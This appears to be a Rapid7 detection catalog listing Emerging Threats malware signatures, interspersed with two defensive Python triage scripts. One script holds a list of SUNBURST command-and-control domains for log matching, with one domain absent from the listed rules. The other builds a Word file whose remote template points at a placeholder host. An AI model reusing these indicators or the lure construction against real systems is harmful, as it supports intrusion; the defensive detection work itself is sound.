ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (highdatabase .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (thedoccloud .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (virtualdataserver .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Backdoor.SUNBURST SSL Cert Inbound (websitetheme .com)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (databasegalore .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (deftsecurity .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (freescanonline .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (highdatabase .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (incomeudpate .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (panhardware .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (thedoccloud .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (websitetheme .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Fireeye] Observed Backdoor.SUNBURST CnC Domain (zupertech .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
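The SUNBURST rules above come in two kinds: the "SSL Cert Inbound" rules match the server certificate presented to the client, while the "in TLS SNI" rules match the server name the client sends in its ClientHello. The Python below is an added triage example, not Rapid7 or Emerging Threats code. It takes the domains from the rule names above and runs those same two checks over a Zeek-style ssl.log excerpt so an alert can be confirmed against your own TLS logs and every internal host that touched a listed domain is collected for review. The log lines, IP addresses and the column subset are constructed for the example.

```python
"""Triage helper for the SUNBURST TLS rules listed above.

Added example, not Rapid7 or Emerging Threats code. The two rule families key on
different TLS fields:
  * "SSL Cert Inbound (<domain>)": the server certificate presented to the
    client names the domain (subject CN, inbound direction).
  * "Observed ... CnC Domain (<domain> in TLS SNI)": the ClientHello carries
    the domain in the server_name extension (outbound direction).
Given a Zeek-style ssl.log (constructed below, tab-separated), report which
internal hosts touched any listed domain and on which field they matched.
"""
from __future__ import annotations

from dataclasses import dataclass

# Domains taken from the rule names above, spelled exactly as they appear there
# (the rule names defang them with a space before the TLD; that space is removed).
SUNBURST_DOMAINS = frozenset({
    "databasegalore.com", "deftsecurity.com", "digitalcollege.org",
    "freescanonline.com", "highdatabase.com", "incomeudpate.com",
    "panhardware.com", "thedoccloud.com", "virtualdataserver.com",
    "websitetheme.com", "zupertech.com",
})

# Constructed sample log. Columns (a subset of Zeek ssl.log, in this order):
# ts, id.orig_h, id.resp_h, id.resp_p, server_name (SNI, "-" if absent), subject
SAMPLE_SSL_LOG = """\
1607900000.1\t10.0.5.21\t203.0.113.10\t443\tupdates.example.com\tCN=updates.example.com
1607900001.2\t10.0.5.21\t203.0.113.44\t443\tfreescanonline.com\tCN=freescanonline.com
1607900002.3\t10.0.5.77\t198.51.100.9\t443\t-\tCN=deftsecurity.com,O=Example
1607900003.4\t10.0.5.90\t198.51.100.9\t443\tapi.deftsecurity.com\tCN=*.deftsecurity.com
1607900004.5\t10.0.5.33\t203.0.113.99\t443\tnotdeftsecurity.com\tCN=notdeftsecurity.com
"""


@dataclass(frozen=True)
class Hit:
    ts: str
    orig_h: str
    resp_h: str
    domain: str
    field: str   # "sni" or "cert"
    value: str


def _names_domain(name: str, domain: str) -> bool:
    """True if name is domain or a subdomain of it; a bare suffix match
    ("notdeftsecurity.com" vs "deftsecurity.com") is deliberately not a hit."""
    name = name.lower().rstrip(".")
    return name == domain or name.endswith("." + domain)


def _cert_cns(subject: str) -> list[str]:
    """Pull CN values out of a Zeek subject string such as 'CN=a.example.com,O=Foo'.
    A wildcard CN (*.example.com) is reduced to its base name."""
    cns = []
    for part in subject.split(","):
        key, _, value = part.strip().partition("=")
        if key.upper() == "CN" and value:
            cns.append(value[2:] if value.startswith("*.") else value)
    return cns


def find_sunburst_tls(log_text: str, domains=SUNBURST_DOMAINS) -> list[Hit]:
    """Scan ssl.log lines and return one Hit per matching field per line."""
    hits: list[Hit] = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, orig_h, resp_h, _port, sni, subject = line.split("\t")
        for domain in sorted(domains):
            if sni != "-" and _names_domain(sni, domain):
                hits.append(Hit(ts, orig_h, resp_h, domain, "sni", sni))
            for cn in _cert_cns(subject):
                if _names_domain(cn, domain):
                    hits.append(Hit(ts, orig_h, resp_h, domain, "cert", cn))
    return hits


def hosts_to_review(hits: list[Hit]) -> list[str]:
    """Internal hosts that should be isolated and examined, one entry each."""
    return sorted({h.orig_h for h in hits})


if __name__ == "__main__":
    for h in find_sunburst_tls(SAMPLE_SSL_LOG):
        print(f"{h.ts} {h.orig_h} -> {h.resp_h} matched {h.domain} via {h.field}={h.value}")
    print("review:", hosts_to_review(find_sunburst_tls(SAMPLE_SSL_LOG)))
```

Two caveats when triaging these alerts. A certificate-based rule only sees the server certificate when the handshake is TLS 1.2 or earlier, because TLS 1.3 encrypts the certificate, and an SNI-based rule needs the sensor to sit on the path the ClientHello actually takes; neither fires on traffic that never crosses the sensor. Second, because SUNBURST reached victims through a trojanized SolarWinds Orion build, a confirmed hit should widen the review to the Orion server and the credentials it held rather than stopping at rebuilding the alerting host.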

ET MALWARE [FIREEYE] PULSECHECK Webshell Access Outbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] SLIGHTPULSE Webshell Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] SLIGHTPULSE Webshell Activity M2 (set) M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] SLIGHTPULSE Webshell Activity M2 (set) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [FIREEYE] SLIGHTPULSE Webshell Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FlashBack Mac OSX malware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [Flashpoint] Possible CVE-2018-4878 Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FoggyWeb Backdoor Incoming Request (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FoggyWeb Backdoor Incoming Request (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Formbook 0.3 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FormBook CnC Checkin (POST) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FortDisco Reporting Status

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Foudre Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Foudre Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Foudre Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Foudre Checkin M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FOX-SRT ShimRat check-in (Data)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FOX-SRT ShimRat check-in (Yuok)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FOX-SRT ShimRatReporter check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FRAT Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FRAT Downloader Error Report POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FRat WebSocket Request M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FRat WebSockets Request M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FraudLoad.aww HTTP CnC Post

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fraudload/FakeAlert/FakeVimes Downloader - POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FrauDrop Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FrauDrop UA LETITGO

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FrauDrop UA single

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fruspam polling for IP likely infected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FTCode Stealer CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE FTCode Stealer Init Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fullz House Credit Card Skimmer Data Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Fullz House Credit Card Skimmer JavaScript Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gaboc Trojan Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Galock Ransomware Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Gamania Trojan Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon APT Maldoc Related Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon APT Related Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon/Armageddon Activity (Retrieving Remote .dot)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon/Armageddon CnC Activity (Sending Windows System Information)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon File Stealer POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon MalDoc CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Remote Template Retrieval (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Maldoc Remote Template Retrieval (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamaredon Style MalDoc .dot Download on freedynamicdns .org

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
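The "Retrieving Remote .dot", "Maldoc Remote Template Retrieval (GET)" and ".dot Download" rules above all fire on the HTTP request Word issues when a document's attached template points at an external URL. When the document itself is available (mail quarantine, the user's Downloads folder), the lure can be confirmed without a packet capture by reading the document's relationship part. The Python below is an added example, not Rapid7 or Emerging Threats code: it builds a minimal .docx in memory (a constructed sample, not a real lure, with a hypothetical template URL) and reports any attachedTemplate relationship whose target is external and reaches out over HTTP, HTTPS, file://host or a UNC path.

```python
"""Host-side check for the remote-template lure behind the Gamaredon rules above.

Added example, not Rapid7 or Emerging Threats code. The "Retrieving Remote .dot"
and "Remote Template Retrieval (GET)" rules fire on the wire when Word fetches an
attached template over HTTP. The same lure is visible in the document itself:
word/settings.xml carries <w:attachedTemplate r:id="..."/> and
word/_rels/settings.xml.rels resolves that id to a TargetMode="External" URL.
The .docx built here is constructed in memory with only the parts the check reads;
the template URL is a hypothetical placeholder.
"""
from __future__ import annotations

import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def _is_remote(target: str) -> bool:
    """HTTP(S), file://host/... and UNC targets reach out; file:///C:/... does not."""
    if target.startswith("\\\\"):          # UNC path: \\host\share\file.dot
        return True
    u = urlparse(target)
    if u.scheme in ("http", "https"):
        return True
    return u.scheme == "file" and bool(u.netloc)


def remote_templates(docx_bytes: bytes) -> list[str]:
    """Return every external attachedTemplate target the document would fetch on open."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return []
        root = ET.fromstring(z.read(SETTINGS_RELS))
    found = []
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        target = rel.get("Target", "")
        if rel.get("TargetMode") == "External" and _is_remote(target):
            found.append(target)
    return found


def build_docx(template_target: str | None) -> bytes:
    """Construct a minimal .docx (constructed sample, not a real lure) with an
    optional external attachedTemplate relationship pointing at template_target."""
    rel = ""
    if template_target is not None:
        rel = (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
               f'Target="{template_target}" TargetMode="External"/>')
    rels_xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                f'<Relationships xmlns="{REL_NS}">{rel}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"/>')
        z.writestr("word/settings.xml",
                   f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
                   '<w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr(SETTINGS_RELS, rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical template URL of the kind the GET rules above would see requested.
    lure = build_docx("http://template.example.invalid/letter.dot")
    print("remote templates:", remote_templates(lure))
    print("clean document:", remote_templates(build_docx(None)))
```

Word issues the template request as soon as the document opens, before any macro prompt, so by the time the network rule fires the request has already left the host; the file check is for confirming what was opened and for screening attachments before delivery. It reads the archive only and never resolves the target.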

ET MALWARE Gamarue/Andromeda Downloading Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gameredon Loader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamut Spambot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gamut Spambot Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GandCrab Style External IP Check (Spoofed Yahoo Host)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GanDownloader CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gasket CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gasket Requesting Commands from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gasket Submitting Logs to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gatak CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Gazer HTTP POST Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE GCleaner Downloader Activity M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Banker.PWS POST Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Downloader Checkin URL (GUID+)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Trojan Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Win32 Backdoor Checkin POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE General Win32 Backdoor Checkin POST Packet 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic - 8Char.JAR Naming Algorithm

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic .bin download from Dotted Quad

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Bot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Checkin - MSCommonInfoEx

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Downloader checkin (3)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Generic Downloader Checkin - HTTP GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

